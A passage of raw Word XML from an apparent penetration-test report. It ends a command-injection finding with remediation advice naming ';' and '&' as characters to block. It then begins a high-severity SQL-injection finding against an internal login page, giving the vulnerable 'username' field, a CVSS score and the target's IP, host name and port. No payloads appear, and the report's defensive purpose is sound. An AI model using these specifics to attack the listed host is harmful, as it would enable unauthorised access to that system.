                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65AA1E63" w14:textId="77777777" w:rsidR="00027997" w:rsidRPr="002355AE" w:rsidRDefault="00027997" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">To fix this issue the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>banner_text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> can be sanitized here before being added to the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> variable. This is also possible at another point of the function. When banner -s is used to change the content of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>banner_text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> variable, the validation of user input can be performed as well. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4074F93C" w14:textId="5EE26C0D" w:rsidR="00DB29D8" w:rsidRPr="002355AE" w:rsidRDefault="00DB29D8" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>One way to validate the user input is to v</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alidat</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">e </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>that the input contains only alphanumeric characters, no other syntax.</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> In that case input </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">like </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> would not be allowed and therefore the command injection would be limited. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F580AD0" w14:textId="768D9FEC" w:rsidR="00DB29D8" w:rsidRPr="002355AE" w:rsidRDefault="00DB29D8" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Another way to fix the vulnerability would be to use a Python library that can provide the same or at least similar functionality to for the program. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="320C0FE1" w14:textId="2BBD0BFA" w:rsidR="00027997" w:rsidRPr="002355AE" w:rsidRDefault="00DB29D8" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">If a fix for this vulnerability is not possible to implement, the author recommends that the feature of changing the banner text should be deactivated. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA3E77D" w14:textId="77777777" w:rsidR="00DB29D8" w:rsidRPr="002355AE" w:rsidRDefault="00DB29D8" w:rsidP="00027997">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Further links: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DF9663D" w14:textId="0B5FC2FF" w:rsidR="00DB29D8" w:rsidRPr="002355AE" w:rsidRDefault="00DB29D8" w:rsidP="00DB29D8">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PyFiglet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://pypi.org/project/pyfiglet/0.7/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="393369CB" w14:textId="5BCA09A3" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2533F0DB" w14:textId="77777777" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Calibri" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84F250" w14:textId="4DA65D3B" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="0035074C">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc119794113"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="008809DD" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal login page </w:t>
      </w:r>
      <w:r w:rsidR="008809DD" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0035074C" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HIGH)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="196F73B5" w14:textId="77777777" w:rsidTr="00FA5639">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0D50AEC6" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2414CA1A" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>njection</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is a web security vulnerability that allows an attacker to interfere with </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>queries that an application</w:t>
            </w:r>
            <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> performs for its functionality</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C9189D" w14:textId="77777777" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">It allows </w:t>
            </w:r>
            <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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behavior.</w:t>
            </w:r>
            <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1F3FF6" w14:textId="651DEC70" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">This can also allow the attack to bypass authentication measures and login as any user to the application. </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other backend </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infrastructure</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4D8EE2" w14:textId="3ED1ED21" w:rsidR="00F21847" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>In this case the vulnerable application</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> provides a login mask to the user</w:t>
            </w:r>
            <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, where the input field </w:t>
            </w:r>
            <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidR="00FA5639" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is vulnerable to a SQL Injection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="40655964" w14:textId="77777777" w:rsidTr="00FA5639">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="63B6A71E" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="541577ED" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="00FA5639" w:rsidP="006234C2">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:anchor="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="713604DC" w14:textId="56A693D7" w:rsidR="00FA5639" w:rsidRPr="002355AE" w:rsidRDefault="00FA5639" w:rsidP="0035074C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This vulnerability can be exploited fully remote without any prior knowledge of the underlying system, nor any credentials needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="28C16F6D" w14:textId="77777777" w:rsidTr="00FA5639">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0B2339B5" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="4668"/>
              <w:gridCol w:w="1276"/>
              <w:gridCol w:w="2138"/>
            </w:tblGrid>
            <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="45EA9BB2" w14:textId="77777777" w:rsidTr="00F21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014154A9" w14:textId="50285DC6" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>IP address</w:t>
                  </w:r>
                  <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / Host</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1276" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="42598CBE" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Port</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2138" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="00793B75" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Protocol</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="247E8C9D" w14:textId="77777777" w:rsidTr="00F21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5463CB3D" w14:textId="5BBA7B7A" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>13.40.105.124</w:t>
                  </w:r>
                  <w:r w:rsidR="00F21847" w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> / internal.vese.com</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1276" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1378C4B8" w14:textId="6687D013" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="00F21847" w:rsidP="006234C2">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2355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>80</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2138" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1B1F8D5B" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">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2355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>TCP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="61698934" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
